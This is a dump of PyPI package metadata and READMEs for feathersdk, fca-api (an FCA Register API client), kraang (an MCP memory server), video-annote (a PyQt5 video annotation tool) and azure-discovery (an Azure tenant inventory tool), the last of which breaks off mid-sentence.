Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS Copyright 2025 Feather Robotics Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
null
[ "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Programming Language :: Python :: 3.14", "Programming...
[]
null
null
>=3.9
[]
[]
[]
[ "canopen", "pyserial", "typing_extensions", "filelock", "numpy>=1.10", "psutil", "smbus2", "hydra-core", "pandas", "scipy", "pyarrow" ]
[]
[]
[]
[]
twine/6.2.0 CPython/3.11.14
2026-02-19T22:08:51.202832
feathersdk-0.0.11.tar.gz
186,298
02/77/bb5decdd0026d044703e40817c8e74363caabff9509e644c858757bc2724/feathersdk-0.0.11.tar.gz
source
sdist
null
false
883a0389ebfce3ea89788656854dec93
fdc501016b4d2d4bb276f7e70fc16aa286fed06e0f84af13e048cf1a4f4b5dca
0277bb5decdd0026d044703e40817c8e74363caabff9509e644c858757bc2724
null
[ "LICENSE" ]
224
2.4
fca-api
1.0.3
Python client library for the UK Financial Services (FCA) Register RESTful API
# fca-api [![CI](https://github.com/release-art/fca-api/actions/workflows/ci.yml/badge.svg)](https://github.com/release-art/fca-api/actions/workflows/ci.yml) [![CodeQL](https://github.com/release-art/fca-api/actions/workflows/codeql.yml/badge.svg)](https://github.com/release-art/fca-api/actions/workflows/codeql.yml) [![License: MPL 2.0](https://img.shields.io/badge/License-MPL_2.0-brightgreen.svg)](https://opensource.org/licenses/MPL-2.0) [![PyPI version](https://img.shields.io/pypi/v/fca-api?logo=python&color=41bb13)](https://pypi.org/project/fca-api) A comprehensive async Python client library for the UK Financial Conduct Authority's [Financial Services Register](https://register.fca.org.uk/s/) [RESTful API](https://register.fca.org.uk/Developer/s/). ## Overview This package provides both high-level and low-level asynchronous interfaces to interact with the FCA's Financial Services Register API. It offers type-safe, well-documented access to query information about: - **Financial firms** and their comprehensive details - **Individual professionals** in the financial services industry - **Investment funds** and collective investment schemes - **Regulatory permissions** and restrictions - **Disciplinary actions** and enforcement history - **Regulated markets** and trading venues > **Note:** This is an async fork of the [`financial-services-register-api`](https://github.com/sr-murthy/financial-services-register-api) package, completely rewritten for modern async/await patterns with comprehensive type safety and documentation. ## Requirements - Python 3.11 or higher - httpx library for async HTTP requests - pydantic for data validation and parsing ## Installation Install from PyPI using pip: ```bash pip install fca-api ``` ## Quick Start Here's a simple example to get you started with the high-level client: ```python import asyncio import fca_api async def main(): # Using async context manager (recommended) async with fca_api.async_api.Client( credentials=("your.email@example.com", "your_api_key") ) as client: # Search for firms by name firms = await client.search_frn("Barclays") print(f"Found {len(firms)} firms matching 'Barclays'") # Iterate through paginated results async for firm in firms: print(f"• {firm.name} (FRN: {firm.frn}) - Status: {firm.status}") # Get detailed information about a specific firm if len(firms) > 0: firm_details = await client.get_firm(firms[0].frn) print(f"\nFirm Details:") print(f"Name: {firm_details.name}") print(f"Status: {firm_details.status}") print(f"Effective Date: {firm_details.effective_date}") if __name__ == "__main__": asyncio.run(main()) ``` ## Architecture The library provides two complementary interfaces: ### High-Level Client (`fca_api.async_api.Client`) - **Type-safe**: All responses are validated with Pydantic models - **Pagination**: Automatic lazy-loading pagination with `async for` support - **Convenient**: Intuitive methods like `search_frn()`, `get_firm()`, etc. - **Error handling**: Meaningful exceptions and validation ### Raw Client (`fca_api.raw_api.RawClient`) - **Direct access**: Minimal abstraction over HTTP API - **Flexible**: For advanced use cases and custom processing - **Performance**: Lower overhead for bulk operations - **Testing**: Ideal for debugging and API exploration ## Key Features - **Asynchronous Operations**: Built with async/await for efficient concurrent requests - **Comprehensive Documentation**: Extensive docstrings and examples for all methods - **Type Safety**: Full type annotation support with Pydantic validation - **Smart Pagination**: Lazy-loading pagination with automatic page fetching - **Robust Error Handling**: Meaningful exceptions with detailed context - **High Performance**: Optimized for both single queries and bulk operations - **Well Tested**: Comprehensive test suite with response caching - **Extensible**: Clean architecture for custom extensions ## Usage Examples ### Searching and Pagination ```python import fca_api async with fca_api.async_api.Client(credentials=("email", "key")) as client: # Search returns a lazy-loading paginated list results = await client.search_frn("revolution") # Check total results without loading all pages print(f"Total results: {len(results)}") # Access specific items by index (loads pages as needed) first_result = results[0] # Iterate through all results efficiently async for firm in results: print(f"{firm.name} - {firm.status}") # Or load all pages at once for bulk processing await results.fetch_all_pages() ``` ### Firm Information ```python # Get comprehensive firm details firm = await client.get_firm("123456") # Using FRN print(f"Firm: {firm.name}") print(f"Status: {firm.status}") # Get related information addresses = await client.get_firm_addresses("123456") permissions = await client.get_firm_permissions("123456") individuals = await client.get_firm_individuals("123456") async for address in addresses: print(f"Address: {', '.join(address.address_lines)}") ``` ### Individual and Fund Searches ```python # Search for individuals individuals = await client.search_irn("John Smith") async for person in individuals: print(f"{person.name} (IRN: {person.irn})") # Search for funds/products funds = await client.search_prn("Vanguard") async for fund in funds: print(f"{fund.name} (PRN: {fund.prn})") ``` ### Error Handling ```python import fca_api.exc try: firm = await client.get_firm("invalid_frn") except fca_api.exc.FcaRequestError as e: print(f"API request failed: {e}") except fca_api.exc.FcaBaseError as e: print(f"General API error: {e}") ``` ### Rate Limiting ```python from asyncio_throttle import Throttler # Limit to 10 requests per second throttler = Throttler(rate_limit=10) async with fca_api.async_api.Client( credentials=("email", "key"), api_limiter=throttler ) as client: # All requests will be automatically rate limited results = await client.search_frn("test") ``` ## Raw Client Usage For advanced use cases or when you need direct API access: ```python import fca_api.raw client = fca_api.raw_api.RawClient( credentials=("email", "key") ) # Direct API calls return raw responses response = await client.search_frn("Barclays", page=0) if response.fca_api_status == "Success": for item in response.data: print(f"Raw data: {item}") print(f"Pagination info: {response.result_info}") ``` ## Documentation The library includes comprehensive documentation: - **In-code documentation**: All classes and methods have detailed docstrings - **Type hints**: Complete type information for IDE support - **Examples**: Practical examples in every docstring - **API reference**: Auto-generated from docstrings (Sphinx-compatible) Access documentation in your IDE or Python REPL: ```python import fca_api help(fca_api.async_api.Client) # High-level client help(fca_api.async_api.Client.search_frn) # Specific method help(fca_api.types.firm.FirmDetails) # Response types ``` For complete API reference and advanced usage, visit the [full documentation](https://docs.release.art/fca-api/). ## Contributing Contributions are welcome! Please see [contributing guidelines](https://docs.release.art/fca-api/sources/contributing.html) on how to contribute to this project. ## License This project is licensed under the Mozilla Public License 2.0. See the [LICENSE](LICENSE) file for details. ## Support If you encounter any issues or have questions, please: 1. Check the comprehensive in-code documentation with `help()` 2. Review the [complete documentation](https://docs.release.art/fca-api/) 3. Search existing [GitHub issues](https://github.com/release-art/fca-api/issues) 4. Create a new issue if your problem hasn't been addressed ## API Authentication To use this library, you need API credentials from the FCA Developer Portal: 1. Visit [FCA Developer Portal](https://register.fca.org.uk/Developer/s/) 2. Register for an account 3. Generate API credentials (email and API key) 4. Use these credentials when initializing the client **Note**: Keep your API credentials secure and never commit them to version control.
text/markdown
null
"I. Orlovs" <ilja@release.art>, "S. R. Murthy" <s.murthy@tutanota.com>
null
"I. Orlovs" <ilja@release.art>
null
financial conduct authority, FCA, financial data, financial regulation, financial services register, financial services, prudential regulation authority, regulated markets, restful api, uk, united kingdom
[ "Environment :: Console", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Development Status :: 4 - Beta", "Operating System :: POSIX :: Linux", "Operating System :: MacOS", "Operati...
[]
null
null
>=3.11
[]
[]
[]
[ "httpx>=0.28.1", "pydantic>=2.12.5" ]
[]
[]
[]
[ "Homepage, https://docs.release.art/fca-api/", "Documentation, https://docs.release.art/fca-api/", "Repository, https://github.com/release-art/fca-api/" ]
pdm/2.26.6 CPython/3.13.11 Linux/6.11.0-1018-azure
2026-02-19T22:07:39.469799
fca_api-1.0.3.tar.gz
46,075
8f/f6/d23da981bcddc8fabb25a491a744b5b1c33316bbfc0c3a20885f1c19f804/fca_api-1.0.3.tar.gz
source
sdist
null
false
716e65a60428d017b24d8ab445384f5b
ee6b1ab3310acaf53a76d0d5f7bfcadd763fb0ed1a3aef2efa3ea18861170bdf
8ff6d23da981bcddc8fabb25a491a744b5b1c33316bbfc0c3a20885f1c19f804
null
[]
211
2.4
kraang
0.2.1
A second brain for humans and their agents — MCP server backed by SQLite FTS5.
<table> <tr> <td><img src="assets/kraang.jpeg" alt="Kraang" width="350"></td> <td><h1>Kraang</h1><b>A second brain for you and your agents.</b></td> </tr> </table> Kraang is an MCP (Model Context Protocol) server that gives AI assistants persistent memory and session indexing, backed by SQLite with FTS5 full-text search. It stores knowledge notes, indexes conversation transcripts, and surfaces what matters via search. ## Why? AI assistants forget everything between sessions. Kraang gives them persistent memory — decisions, debugging breakthroughs, patterns — so your next conversation picks up where the last one left off. ## Quick Start The fastest way to get started is with `kraang init`: ```bash uvx kraang init # ephemeral — downloads on each run uv tool install kraang # persistent — install once, use everywhere kraang init ``` This creates a `.kraang/` directory, initializes the database, configures `.mcp.json`, sets up a `SessionEnd` hook for automatic session indexing, creates `.claude/rules/kraang.md` for proactive agent behavior, and indexes any existing sessions. ### Manual Configuration Add to your MCP client configuration (e.g. Claude Code, Claude Desktop): ```json { "mcpServers": { "kraang": { "command": "uvx", "args": ["kraang", "serve"], "env": { "KRAANG_DB_PATH": ".kraang/kraang.db" } } } } ``` ## MCP Tools | Tool | Description | |------|-------------| | `remember` | Save knowledge to the brain. If a note with the same title exists, it updates in place. | | `recall` | Search notes and indexed sessions. Supports scoping to `"notes"`, `"sessions"`, or `"all"`. | | `read_session` | Load a full conversation transcript by session ID (use `recall` to find sessions first). | | `forget` | Downweight or hide a note by adjusting its relevance score (0.0 = hidden, 1.0 = full). | | `status` | Get a knowledge base overview: note/session counts, recent activity, top tags. | ## CLI Commands | Command | Description | |---------|-------------| | `kraang init` | Set up kraang for the current project (database, config, hooks, initial index). | | `kraang serve` | Run the MCP server over stdio (invoked by Claude Code). | | `kraang index` | Index or re-index conversation sessions for the project. | | `kraang sessions` | List recent conversation sessions. | | `kraang session <id>` | View a session transcript in detail. | | `kraang search <query>` | Search notes and sessions from the terminal. | | `kraang notes` | List notes in the knowledge base. | | `kraang status` | Show knowledge base health and statistics. | ## Architecture Kraang uses a layered architecture: 1. **Models** (`models.py`) -- Pydantic schemas for notes, sessions, and search results. 2. **Store** (`store.py`) -- SQLite backend with FTS5 full-text search and BM25 ranking. 3. **Search** (`search.py`) -- Query parsing and FTS5 expression building. 4. **Indexer** (`indexer.py`) -- Reads Claude Code JSONL transcripts and indexes sessions. 5. **Server** (`server.py`) -- MCP server exposing 5 tools over stdio. 6. **CLI** (`cli.py`) -- Typer CLI for init, serve, index, and local queries. 7. **Formatter** (`formatter.py`) -- Markdown formatting for tool and CLI output. 8. **Display** (`display.py`) -- Rich console rendering for CLI commands. 9. **Config** (`config.py`) -- Project root detection and database path resolution. ## Development ```bash git clone https://github.com/johnnygreco/kraang.git && cd kraang uv sync --extra dev make install-hooks # install pre-commit hooks (run once) make test make lint ``` Pre-commit hooks run automatically before each commit (ruff format, ruff check --fix, ty). Run manually: ```bash uv run pre-commit run --all-files ``` Run the full check suite: ```bash make coverage # tests + coverage report make format # auto-format with ruff ``` ## Troubleshooting | Problem | Fix | |---------|-----| | Kraang tools not showing up in Claude Code | Restart Claude Code after running `kraang init` | | Sessions not being indexed automatically | Check that `.claude/settings.json` has the `SessionEnd` hook | | Search returns nothing | Run `kraang status` to check counts, then `kraang index` to re-index | | Need a fresh start | Delete `.kraang/` and re-run `kraang init` | ## License Apache 2.0
text/markdown
Johnny Greco
null
null
null
null
fts5, knowledge-management, mcp, second-brain, sqlite
[ "Development Status :: 3 - Alpha", "License :: OSI Approved :: Apache Software License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12" ]
[]
null
null
>=3.10
[]
[]
[]
[ "aiosqlite>=0.20.0", "mcp<2,>=1.2.0", "pydantic>=2.0", "rich>=13.0", "typer>=0.12", "coverage>=7.0; extra == \"dev\"", "pre-commit>=3.0; extra == \"dev\"", "pytest-asyncio>=0.23; extra == \"dev\"", "pytest>=8.0; extra == \"dev\"", "ruff>=0.4; extra == \"dev\"", "ty>=0.0.1a7; extra == \"dev\"" ]
[]
[]
[]
[]
twine/6.2.0 CPython/3.13.2
2026-02-19T22:07:21.219817
kraang-0.2.1.tar.gz
148,131
67/47/e72d2078e64e3a02fee47024008a82c83ac14256d0fb08fc935ad89a8e8f/kraang-0.2.1.tar.gz
source
sdist
null
false
85a9a51702c91456a0994cd5fbbbf68e
bc2137c83c6fee616c10aab3b312777e6f27d44e6e662d0d9bebcaaca39008a2
6747e72d2078e64e3a02fee47024008a82c83ac14256d0fb08fc935ad89a8e8f
Apache-2.0
[ "LICENSE" ]
226
2.4
video-annote
0.1.1
video-annote is a lightweight multi-video annotation tool (PyQt5) for labeling time ranges (“labels”) while reviewing one or more videos.
# video-annote **Minimum Python:** `>=3.10` **video-annote** is a lightweight **multi-video annotation tool** (PyQt5) for labeling time ranges (“labels”) while reviewing one or more videos. You can: - Create/import sessions that contain multiple videos (local files or URLs) - Choose a **Time Source** (master timeline) and an **Audio Source** - Play/pause/restart and scrub safely - Mark **start/end** for labels and save annotations - Review and edit annotations via a **timeline** and a **table** - Autosave session state as you work --- ## Screenshot ![Video-Annote screenshot](docs/screenshot.png) --- ## Requirements - **Python >= 3.10** - **PyQt5** - **ffmpeg + ffprobe** ### Why ffmpeg/ffprobe? `video-annote` uses `ffmpeg/ffprobe` for: - importing URL-based videos (including `.m3u8`) - reading duration/FPS reliably --- ## Install ffmpeg + ffprobe Pick **one** method below. ### Option A: Conda If you plan to use Conda for Python, install ffmpeg into the same environment: ```bash conda install -c conda-forge ffmpeg -y ``` ### Option B: macOS (Homebrew) ```bash brew install ffmpeg ``` ### Option C: Ubuntu / Debian ```bash sudo apt-get update sudo apt-get install -y ffmpeg ``` ### Option D: Windows - Install ffmpeg (includes ffprobe) and add it to your **PATH**. After installing, verify: ```bash ffmpeg -version ffprobe -version ``` --- ## Recommended: Conda environment setup This is the most reproducible setup (and the easiest way to ensure ffmpeg/ffprobe are available). ### 1) Create and activate an environment ```bash conda create -n video-annote python=3.10 -y conda activate video-annote ``` ### 2) Install ffmpeg (inside the env) ```bash conda install -c conda-forge ffmpeg -y ``` > From here on, **run the remaining install/run steps inside this activated conda environment**. --- ## Install & run Choose one of the following approaches. ### A) Install from PyPI (pip) ```bash pip install video-annote python -m video_annote ``` ### B) Using uv (great for development) ```bash git clone https://github.com/Surya-Rayala/Video-Annote.git cd Video-Annote uv sync uv run python -m video_annote ``` Notes: - If you use **uv**, you can still use the system/conda-installed ffmpeg as long as it’s on PATH. - If you created a **conda env**, make sure it’s activated before running uv commands so the env’s ffmpeg is used. --- ## How to use ### 1) Select a Data Root Click **Select Root** and choose a folder where sessions will be stored. ### 2) Create or import a session - **Create New Session** - Enter a session label (example: `session_001`) - Add videos: - **Local file…** - **URL…** (downloadable URL or `.m3u8` — requires ffmpeg) - **Import Existing Session** - Loads an already-saved session from the Data Root ### 3) Choose which videos are visible Use **Selected videos** (multi-select) to choose which videos appear in the grid. ### 4) Pick Time Source and Audio Source - **Time Source** = master timeline used for the slider and annotation timestamps - **Audio Source** = which video provides sound > Other videos are kept aligned to the Time Source during playback when possible. > If a video is shorter than the current Time Source position, its cell may show black. ### 5) Playback and scrubbing - **Play / Pause / Restart** - Drag the timeline slider to seek - Play is disabled at the end of the Time Source (use Restart) > **Note on playback smoothness:** On some machines (or when the system is under heavy load), video playback may feel choppy and/or audio may stutter. If that happens, click **Restart** or nudge the timeline slider slightly **forward or backward** to help playback re-sync and settle. --- ## Creating annotations (label workflow) ### 1) Create Labels On the right panel (**Labels**): - Add label number + name (example: `1: Label1`, `2: Label2`, …) - Each label is assigned a stable color ### 2) Start a label - Select a label - Click **Start** - Move the playhead to where the label begins - Click **Confirm Start** ### 3) End and save - Play forward (or scrub) to where the label ends - Click **End** - Adjust the end position if needed - Click **Confirm End** to save (confidence + notes) This saves an **annotation** for that label. --- ## Timeline & table (review + editing) ### Timeline The timeline shows all labels as colored blocks: - Click a block to view details - Edit to adjust start/end (drag handles) ### Table The table shows every annotation row: - Derived fields are locked for safety - Only key fields can be edited (start/end time, label number, confidence, notes) --- ## Running from Python (advanced) ```python from PyQt5.QtWidgets import QApplication from video_annote.main_window import MainWindow app = QApplication([]) w = MainWindow() w.show() app.exec_() ``` --- ## Troubleshooting ### Playback feels choppy or audio stutters On some systems, playback smoothness depends on your computer’s performance and current load. If video or audio becomes unstable: - Click **Restart**, or - Move the timeline slider slightly **forward or backward** to let playback re-sync. ### Playhead jumps back to the start near the end (known issue) Sometimes, after reaching the end of the **Time Source**, playback may jump back to **00:00**. This usually happens while labeling (after **Confirm Start** or after clicking **End**), **Confirm End** may not save because the end time becomes earlier than the start time. **Fix:** drag the timeline slider to the desired label end time (away from the start time), then click **Confirm End** again. ## License This project is licensed under the **MIT License**. See `LICENSE` for details. ---
text/markdown
null
Surya Chand Rayala <suryachand2k1@gmail.com>
null
null
MIT License Copyright (c) 2026 Surya Chand Rayala Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
null
[]
[]
null
null
>=3.10
[]
[]
[]
[ "pyqt5==5.15.11" ]
[]
[]
[]
[]
uv/0.10.0 {"installer":{"name":"uv","version":"0.10.0","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"macOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null}
2026-02-19T22:07:00.373323
video_annote-0.1.1.tar.gz
51,208
09/83/ff369c2a33654206618028e316d29c18f42f1a207fb6c99ac5759439fb0e/video_annote-0.1.1.tar.gz
source
sdist
null
false
0de805bfe8a2eebd76afddfc89baab87
438b26bbaeb19c5fbf9bc0c568b45cf4b504493cd8f521c70b077c55a9f372e1
0983ff369c2a33654206618028e316d29c18f42f1a207fb6c99ac5759439fb0e
null
[ "LICENSE" ]
221
2.4
azure-discovery
0.1.9
Lightweight Azure tenant discovery and visualization via Resource Graph. Enumerates subscriptions and resources, normalizes results, and renders interactive dependency graphs. Supports public and sovereign clouds (Gov, China, Germany, Azure Stack).
# Azure Discovery Azure Discovery is a lightweight Azure tenant mapper that enumerates subscriptions and resources via Azure Resource Graph, normalizes the results, and renders an interactive dependency graph. The tool exposes both a Typer-based CLI (`azure-discovery`) and a FastAPI surface so the same discovery workflow can be automated or embedded in other services. The package is published on [PyPI](https://pypi.org/project/azure-discovery/) as **azure-discovery** and can be installed with `pip install azure-discovery`. ## Core capabilities - Builds environment-aware credential chains (Azure CLI + DefaultAzureCredential) with guardrails for unsupported clouds. - Queries Azure Resource Graph with include/exclude filters, tag constraints, and resource group scopes. - Resolves subscriptions automatically when not provided and de-duplicates resources for consistent graph IDs. - Produces JSON summaries, console metrics, and PyVis HTML graphs for quick triage. - Optionally enumerates Entra ID objects via Microsoft Graph (organization/domains, users, groups, applications, service principals, conditional access policies, risky users) with bounded relationship expansion. - Optionally enumerates Azure RBAC role assignments and definitions with principal-to-resource relationship mapping. - Optionally enumerates PIM (Privileged Identity Management) eligible role assignments for both Entra ID roles and Azure resource roles. - Optionally enumerates Defender for Cloud security alerts, assessments, and secure scores for security posture analysis. - Offers identical request/response contracts (Pydantic models) across CLI and API, following the Receive an Object, Return an Object (RORO) pattern. - Supports all Azure clouds: public, Government (GCC/GCC-H), China, Germany, and Azure Stack. - Adaptive rate control and intelligent batching for large-scale tenant discovery. - API hardening with pluggable authentication (Azure AD, API key), rate limiting, audit logging, and CORS. ## Installation **From PyPI (recommended):** ```bash pip install azure-discovery ``` **With optional development dependencies:** ```bash pip install azure-discovery[dev] ``` **From source (e.g. for development or when embedded in another repo):** ```bash git clone https://github.com/maravedi/AzureDiscovery.git cd AzureDiscovery pip install -e .[dev] ``` ## Package layout When installed, the package provides the **azure_discovery** Python package: ``` azure_discovery/ __init__.py # run_discovery, AzureDiscoveryRequest, AzureDiscoveryResponse, etc. cli.py # Typer command surface (entry point: azure-discovery) api.py # FastAPI app for /discover and visualization endpoints orchestrator.py # Async coordinator for enumeration + visualization adt_types/ # Pydantic models and custom exceptions enumerators/ # Resource Graph query builder and normalization reporting/ # Console logging and HTML/PyVis graph generation utils/ # Azure SDK clients, graph helpers, structured logging ``` ## Usage ### CLI ARM-only discovery: ```bash azure-discovery discover \ --tenant-id <tenant-guid> \ --subscription <sub-id-1> --subscription <sub-id-2> \ --include-type "Microsoft.Compute/virtualMachines" \ --resource-group core-infra \ --required-tag environment=prod \ --visualization-output-dir artifacts/graphs ``` ARM + Entra discovery (example): ```bash azure-discovery discover \ --tenant-id <tenant-guid> \ --subscription <sub-id-1> \ --include-entra \ --entra-group-membership-max-groups 50 \ --entra-group-membership-max-members-per-group 200 ``` Entra + RBAC discovery only (without Azure resources; pass `--subscription` so RBAC has scope): ```bash azure-discovery discover \ --tenant-id <tenant-guid> \ --subscription <sub-id> \ --no-include-azure-resources \ --include-entra \ --include-rbac-assignments ``` ARM + RBAC discovery (example): ```bash azure-discovery discover \ --tenant-id <tenant-guid> \ --subscription <sub-id-1> \ --include-rbac-assignments \ --include-rbac-definitions \ --rbac-scope "/subscriptions/<sub-id-1>" ``` ARM + PIM discovery (example): ```bash azure-discovery discover \ --tenant-id <tenant-guid> \ --subscription <sub-id-1> \ --include-pim \ --pim-include-entra-eligibilities \ --pim-include-azure-resource-eligibilities ``` ARM + Defender for Cloud discovery (example): ```bash azure-discovery discover \ --tenant-id <tenant-guid> \ --subscription <sub-id-1> \ --include-defender-cloud \ --defender-alert-severity High --defender-alert-severity Critical \ --defender-alert-status Active ``` Using a config file (JSON/TOML/YAML): ```bash # CLI flags override file values azure-discovery discover --config examples/config.example.toml # You can still override specific values azure-discovery discover --config examples/config.example.toml --include-entra --entra-max-objects 10000 ``` Examples: - [examples/config.example.toml](examples/config.example.toml) - [examples/config.example.yaml](examples/config.example.yaml) Configuration docs: - [docs/configuration.md](docs/configuration.md) Tip: you can generate a JSON starter config by running with `--preview-request` and saving stdout. Run as a module from source (from the repo root): ```bash python -m azure_discovery.cli discover --help python -m azure_discovery.cli discover --tenant-id <tenant-guid> --environment azure_gov [options...] ``` ### FastAPI Run the server: ```bash uvicorn azure_discovery.api:app --host 0.0.0.0 --port 8000 --reload ``` Optional: set `AZURE_DISCOVERY_CONFIG=/path/to/discovery.toml` to apply default values to incoming requests (request body fields win). Health check: ```bash curl http://localhost:8000/healthz ``` Discovery request (example): ```bash curl -X POST http://localhost:8000/discover \ -H "Content-Type: application/json" \ -d '{ "tenant_id": "<tenant-guid>", "environment": "azure_public", "subscriptions": ["<sub-id>"] }' ``` Enable Entra + relationship expansion (example): ```bash curl -X POST http://localhost:8000/discover \ -H "Content-Type: application/json" \ -d '{ "tenant_id": "<tenant-guid>", "environment": "azure_public", "subscriptions": ["<sub-id>"], "include_entra": true, "include_relationships": true, "entra_group_membership_max_groups": 50, "entra_group_membership_max_members_per_group": 200 }' ``` Download visualization: ```bash curl http://localhost:8000/visuals/<file-name> --output graph.html ``` ### Python Async usage: ```python from azure_discovery import run_discovery from azure_discovery.adt_types import AzureDiscoveryRequest, AzureEnvironment request = AzureDiscoveryRequest( tenant_id="<tenant-guid>", environment=AzureEnvironment.AZURE_PUBLIC, subscriptions=["<sub-id>"], include_entra=True, ) response = await run_discovery(request) print(len(response.nodes), len(response.relationships), response.html_report_path) ``` Load from config file: ```python from pathlib import Path from azure_discovery.utils.config_files import load_request_from_file request = load_request_from_file(Path("examples/config.example.yaml")) ``` Sync script wrapper: ```python import asyncio from azure_discovery import run_discovery from azure_discovery.adt_types import AzureDiscoveryRequest, AzureEnvironment request = AzureDiscoveryRequest( tenant_id="<tenant-guid>", environment=AzureEnvironment.AZURE_PUBLIC, ) response = asyncio.run(run_discovery(request)) print(response.total_resources) ``` ## Azure resources discovery By default (`include_azure_resources=true`), Azure Discovery enumerates Azure resources from 